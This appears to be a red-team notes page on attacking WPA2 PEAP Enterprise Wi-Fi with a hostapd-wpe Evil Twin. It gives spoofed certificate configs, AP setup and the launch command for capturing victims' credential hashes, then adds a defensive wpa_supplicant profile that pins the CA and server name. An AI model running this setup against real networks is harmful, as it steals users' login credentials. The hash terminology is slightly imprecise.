Hacking Notes
WPA/WPA2 PEAP (Enterprise)

Last updated 3 years ago

In WPA2 PEAP networks (that is, Enterprise networks) there is no pre-shared key: users authenticate with their LDAP credentials. The router or AP does not itself know whether those credentials are valid, so it delegates the check to a RADIUS server. The handshake cannot be captured, because the server never completes the authentication, so instead of capturing a handshake we create an Evil Twin, but this time one that performs the authentication itself. That authentication is what we are interested in capturing, remember that the credentials being sent are LDAP credentials.

EvilTwin

To carry out this task we use the hostapd-wpe software.

Configuring Certificates

First, note that when a user authenticates to our fake AP, some information about the server certificate is displayed to them; to make it convincing, the certificate should look as realistic as possible.

So we need to modify the following files:

  • /etc/hostapd-wpe/certs/server.cnf

[server]
countryName             = ES
stateOrProvinceName     = Salamanca
localityName            = Salamanca
organizationName        = Red Team Inc.
emailAddress            = admin@redteam.com
commonName              = "Certificado de Red Team Inc."

  • /etc/hostapd-wpe/certs/client.cnf

[client]
countryName             = ES
stateOrProvinceName     = Salamanca
localityName            = Salamanca
organizationName        = Red Team Inc.
emailAddress            = user@redteam.com
commonName              = user@redteam.com

  • /etc/hostapd-wpe/certs/ca.cnf

[certificate_authority]
countryName             = ES
stateOrProvinceName     = Salamanca
localityName            = Salamanca
organizationName        = Red Team Inc.
emailAddress            = admin@redteam.com
commonName              = "Entidad certificadora de Red Team Inc."

Finally, we generate the certificates with the bootstrap script:

/etc/hostapd-wpe/certs/bootstrap

Configuring the Fake AP

Once the certificates are configured and created, the final step is to configure our fake AP. We copy the default hostapd-wpe config file and modify the copy.

cp /etc/hostapd-wpe/hostapd-wpe.conf /etc/hostapd-wpe/redteam.conf
vim /etc/hostapd-wpe/redteam.conf

# Modify the following values:

interface=<IFACE>
ssid=<ESSID>
channel=<CHANNEL>

Launch & wait for s3crets

Finally, launch hostapd-wpe with the modified configuration file:

hostapd-wpe /etc/hostapd-wpe/redteam.conf

When a victim connects to our fake AP, we obtain their NETLM hash.
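The attack above only succeeds when the client accepts the fake AP's server certificate, which is why the certificate details are dressed up to look real. As an added example that is not part of the original page, this is a wpa_supplicant network block for a WPA2 Enterprise (PEAP) client that pins the organisation's CA and the RADIUS server name, so an Evil Twin's certificate is rejected before any inner MSCHAPv2 credentials are sent. The SSID, identity, CA path and server name are placeholders, not values from this page.

```ini
# Added example (not from the original page): wpa_supplicant network block
# for a WPA2 Enterprise (PEAP) network that validates the RADIUS server.
# SSID, identity, CA path and server name below are placeholders.
network={
    ssid="CORP-WIFI"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="user@corp.example"
    # Outer identity sent in the clear; keep it anonymous
    anonymous_identity="anonymous@corp.example"
    password="<password>"
    # Trust only the organisation's own CA, not the system-wide store
    ca_cert="/etc/wpa_supplicant/corp-ca.pem"
    # The server certificate's name must match exactly; a certificate
    # produced by the bootstrap script above fails both checks
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
```

With ca_cert and domain_match set, wpa_supplicant aborts the EAP exchange when the certificate is not issued by the pinned CA or its name does not match, and it never prompts the user to "accept" an unknown certificate. The equivalent controls on Windows PEAP profiles are "Validate server certificate", the trusted root CA selection and the server-name restriction; pushing these through managed profiles is the practical defence against this class of Evil Twin.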

[Figure: WPA2 PEAP Message Exchange]